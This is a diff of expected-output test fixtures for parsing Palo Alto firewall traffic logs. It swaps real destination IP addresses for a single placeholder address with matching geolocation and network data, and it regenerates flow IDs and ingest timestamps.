@@ -14559,7 +14692,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:aHhDlT3Bx285CJRrBykpRsei1a0=" + "community_id": "1:mNPaSFsPbmvnxLHzxtQF8JFWqnI=" } }, "sequence_number": 32091199, @@ -14579,8 +14712,8 @@ ], "network": { "community_id": [ - "1:xYiSF9gJFyCzwbXQPyFt8YU2J78=", - "1:aHhDlT3Bx285CJRrBykpRsei1a0=" + "1:N5/EINkZN9//TsD7qX3PTGWIdWs=", + "1:mNPaSFsPbmvnxLHzxtQF8JFWqnI=" ], "transport": "tcp", "application": "ssl", @@ -14620,14 +14753,14 @@ ], "ip": [ "192.168.15.224", - "104.254.150.9", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 11000000000, - "ingested": "2021-09-08T12:40:05.942172295Z", - "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,104.254.150.9,192.168.1.63,104.254.150.9,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24369,1,52510,443,10098,443,0x40001a,tcp,allow,10511,2691,7820,22,2018/11/30 16:09:21,11,web-advertisements,0,32091199,0x0,192.168.0.0-192.168.255.255,United States,0,12,10,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031897500Z", + "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24369,1,52510,443,10098,443,0x40001a,tcp,allow,10511,2691,7820,22,2018/11/30 16:09:21,11,web-advertisements,0,32091199,0x0,192.168.0.0-192.168.255.255,United States,0,12,10,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:50.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -14650,30 +14783,29 @@ "destination": { "nat": { "port": 443, - "ip": "50.19.85.24" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 654, - "ip": "50.19.85.24", + "ip": "175.16.199.1", "packets": 7 }, "rule": { @@ -14692,7 +14824,7 @@ "packets": 8, "ip": "192.168.15.224" }, - "message": "192.168.15.224,50.19.85.24,192.168.1.63,50.19.85.24,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24354,1,52495,443,4564,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091200,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24354,1,52495,443,4564,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091200,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -14707,7 +14839,7 @@ "destination": { "nat": { "port": 443, - "ip": "50.19.85.24" + "ip": "175.16.199.1" } }, "endreason": "tcp-rst-from-client", 
@@ -14729,7 +14861,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:RLfRarGPGl+PnGhB8fb+S+uTX1o=" + "community_id": "1:0LjiyNeD5dfgmsuKD6RMwVWtS28=" } }, "sequence_number": 32091200, @@ -14749,8 +14881,8 @@ ], "network": { "community_id": [ - "1:QTH4ra5ZOxMb5v4tYy8DkqQsSus=", - "1:RLfRarGPGl+PnGhB8fb+S+uTX1o=" + "1:AjRcnk9elPVHpZgvFp+A0IYObog=", + "1:0LjiyNeD5dfgmsuKD6RMwVWtS28=" ], "transport": "tcp", "application": "ssl", @@ -14790,14 +14922,14 @@ ], "ip": [ "192.168.15.224", - "50.19.85.24", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 11000000000, - "ingested": "2021-09-08T12:40:05.942175777Z", - "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,50.19.85.24,192.168.1.63,50.19.85.24,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24354,1,52495,443,4564,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091200,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031901800Z", + "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24354,1,52495,443,4564,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091200,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:50.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -14820,30 +14952,29 @@ "destination": { "nat": { "port": 443, - "ip": "52.0.218.108" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 214, - "ip": "52.0.218.108", + "ip": "175.16.199.1", "packets": 3 }, "rule": { @@ -14862,7 +14993,7 @@ "packets": 4, "ip": "192.168.15.224" }, - "message": "192.168.15.224,52.0.218.108,192.168.1.63,52.0.218.108,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24254,1,52486,443,32104,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091201,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24254,1,52486,443,32104,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091201,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -14877,7 +15008,7 @@ "destination": { "nat": { "port": 443, - "ip": "52.0.218.108" + "ip": "175.16.199.1" } }, "endreason": "tcp-fin", 
@@ -14899,7 +15030,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:/0iCZCsnpk+5MR4Tc26unyr/T4Q=" + "community_id": "1:FBjoTYKNjZjw4YE8HLuGOKi/UVY=" } }, "sequence_number": 32091201, @@ -14919,8 +15050,8 @@ ], "network": { "community_id": [ - "1:pRGS72RJ+/RdCMjmtcrBxdR6i9w=", - "1:/0iCZCsnpk+5MR4Tc26unyr/T4Q=" + "1:pUtVSrJwDFqPE0Yl8SNOGKCtXY8=", + "1:FBjoTYKNjZjw4YE8HLuGOKi/UVY=" ], "transport": "tcp", "application": "incomplete", @@ -14960,14 +15091,14 @@ ], "ip": [ "192.168.15.224", - "52.0.218.108", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 12000000000, - "ingested": "2021-09-08T12:40:05.942179303Z", - "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,52.0.218.108,192.168.1.63,52.0.218.108,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24254,1,52486,443,32104,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091201,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031905300Z", + "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24254,1,52486,443,32104,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091201,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:50.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -14990,30 +15121,29 @@ "destination": { "nat": { "port": 443, - "ip": "52.6.117.19" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 214, - "ip": "52.6.117.19", + "ip": "175.16.199.1", "packets": 3 }, "rule": { @@ -15032,7 +15162,7 @@ "packets": 4, "ip": "192.168.15.224" }, - "message": "192.168.15.224,52.6.117.19,192.168.1.63,52.6.117.19,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24246,1,52489,443,14172,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091202,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24246,1,52489,443,14172,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091202,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -15047,7 +15177,7 @@ "destination": { "nat": { "port": 443, - "ip": "52.6.117.19" + "ip": "175.16.199.1" } }, "endreason": "tcp-fin", 
@@ -15069,7 +15199,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:486dmnLzuTH8P7j6jI6JsUtW2VU=" + "community_id": "1:QcbU0WRE/7h+0IQvZM2/UZuqbIU=" } }, "sequence_number": 32091202, @@ -15089,8 +15219,8 @@ ], "network": { "community_id": [ - "1:zaENYnP2VlZewYNuHhpqTvNAf4Y=", - "1:486dmnLzuTH8P7j6jI6JsUtW2VU=" + "1:1+bmhnIQMn7y4mTmEHPdz4onQkg=", + "1:QcbU0WRE/7h+0IQvZM2/UZuqbIU=" ], "transport": "tcp", "application": "incomplete", @@ -15130,14 +15260,14 @@ ], "ip": [ "192.168.15.224", - "52.6.117.19", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 12000000000, - "ingested": "2021-09-08T12:40:05.942183009Z", - "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,52.6.117.19,192.168.1.63,52.6.117.19,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24246,1,52489,443,14172,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091202,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031909900Z", + "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24246,1,52489,443,14172,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091202,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:50.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -15160,30 +15290,29 @@ "destination": { "nat": { "port": 443, - "ip": "34.238.96.22" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 214, - "ip": "34.238.96.22", + "ip": "175.16.199.1", "packets": 3 }, "rule": { @@ -15202,7 +15331,7 @@ "packets": 4, "ip": "192.168.15.224" }, - "message": "192.168.15.224,34.238.96.22,192.168.1.63,34.238.96.22,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24343,1,52490,443,10286,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091203,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24343,1,52490,443,10286,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091203,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -15217,7 +15346,7 @@ "destination": { "nat": { "port": 443, - "ip": "34.238.96.22" + "ip": "175.16.199.1" } }, "endreason": "tcp-fin", 
@@ -15239,7 +15368,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:6LTK93w8ZdfxzSfZXzebKR6jWxo=" + "community_id": "1:DR/FJWxl0KE8kCtqxx39GAbhfOU=" } }, "sequence_number": 32091203, @@ -15259,8 +15388,8 @@ ], "network": { "community_id": [ - "1:FdupsUbF1ju1djczW9JAKlxKNC4=", - "1:6LTK93w8ZdfxzSfZXzebKR6jWxo=" + "1:NUMnfp0g3oB9+utGD+r0aXUodRo=", + "1:DR/FJWxl0KE8kCtqxx39GAbhfOU=" ], "transport": "tcp", "application": "incomplete", @@ -15300,14 +15429,14 @@ ], "ip": [ "192.168.15.224", - "34.238.96.22", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 12000000000, - "ingested": "2021-09-08T12:40:05.942186564Z", - "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,34.238.96.22,192.168.1.63,34.238.96.22,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24343,1,52490,443,10286,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091203,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031915300Z", + "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24343,1,52490,443,10286,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091203,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:50.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -15330,30 +15459,29 @@ "destination": { "nat": { "port": 443, - "ip": "130.211.47.17" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Mountain View", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "California", + "region_name": "Jilin", "location": { - "lon": -122.0748, - "lat": 37.4043 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 280, - "ip": "130.211.47.17", + "ip": "175.16.199.1", "packets": 4 }, "rule": { @@ -15372,7 +15500,7 @@ "packets": 4, "ip": "192.168.15.224" }, - "message": "192.168.15.224,130.211.47.17,192.168.1.63,130.211.47.17,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24262,1,52493,443,30799,443,0x40001c,tcp,allow,556,276,280,8,2018/11/30 16:09:20,12,any,0,32091204,0x0,192.168.0.0-192.168.255.255,United States,0,4,4,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24262,1,52493,443,30799,443,0x40001c,tcp,allow,556,276,280,8,2018/11/30 16:09:20,12,any,0,32091204,0x0,192.168.0.0-192.168.255.255,United States,0,4,4,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -15387,7 +15515,7 @@ "destination": { "nat": { "port": 443, - "ip": "130.211.47.17" + "ip": "175.16.199.1" } }, "endreason": "tcp-fin", 
@@ -15409,7 +15537,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:roV5JFl0FdQHIRUkgeZm+ZeyeCQ=" + "community_id": "1:SyljGYOMfFYBpelQe35LIJQjELY=" } }, "sequence_number": 32091204, @@ -15429,8 +15557,8 @@ ], "network": { "community_id": [ - "1:fHitWYVd9RNFs7M5hQrqw/dmY8Y=", - "1:roV5JFl0FdQHIRUkgeZm+ZeyeCQ=" + "1:hyEMTIsKIIcttx8mBWINE2IMQYw=", + "1:SyljGYOMfFYBpelQe35LIJQjELY=" ], "transport": "tcp", "application": "incomplete", @@ -15470,14 +15598,14 @@ ], "ip": [ "192.168.15.224", - "130.211.47.17", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 12000000000, - "ingested": "2021-09-08T12:40:05.942190040Z", - "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,130.211.47.17,192.168.1.63,130.211.47.17,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24262,1,52493,443,30799,443,0x40001c,tcp,allow,556,276,280,8,2018/11/30 16:09:20,12,any,0,32091204,0x0,192.168.0.0-192.168.255.255,United States,0,4,4,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031920700Z", + "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24262,1,52493,443,30799,443,0x40001c,tcp,allow,556,276,280,8,2018/11/30 16:09:20,12,any,0,32091204,0x0,192.168.0.0-192.168.255.255,United States,0,4,4,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:50.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -15500,27 +15628,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 172, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -15539,7 +15669,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:51,24281,1,59320,53,13490,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:18,0,any,0,32091205,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:51,24281,1,59320,53,13490,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:18,0,any,0,32091205,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -15554,7 +15684,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -15576,7 +15706,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:5G+JVi/ClM/MfHhUL//vH/GmuaA=" + "community_id": "1:iFOe1PdUY9r8dwKaxQH+8rrvnAI=" } }, "sequence_number": 32091205, 
@@ -15596,8 +15726,8 @@ ], "network": { "community_id": [ - "1:n/IZF37E/7cErtK4po3ewuEQScY=", - "1:5G+JVi/ClM/MfHhUL//vH/GmuaA=" + "1:zJk1JtAystoTBaVlRntBCcIln4Q=", + "1:iFOe1PdUY9r8dwKaxQH+8rrvnAI=" ], "transport": "udp", "application": "dns", @@ -15637,14 +15767,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942193529Z", - "original": "Nov 30 16:09:51 PA-220 1,2018/11/30 16:09:51,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:51,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:51,24281,1,59320,53,13490,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:18,0,any,0,32091205,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031926100Z", + "original": "Nov 30 16:09:51 PA-220 1,2018/11/30 16:09:51,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:51,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:51,24281,1,59320,53,13490,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:18,0,any,0,32091205,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:51.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -15667,27 +15797,29 @@ "destination": { "nat": { "port": 0, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 0, "bytes": 588, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 6 }, "rule": { @@ -15706,7 +15838,7 @@ "packets": 6, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24424,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:37,0,any,0,32091206,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24424,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:37,0,any,0,32091206,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -15721,7 +15853,7 @@ "destination": { "nat": { "port": 0, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", 
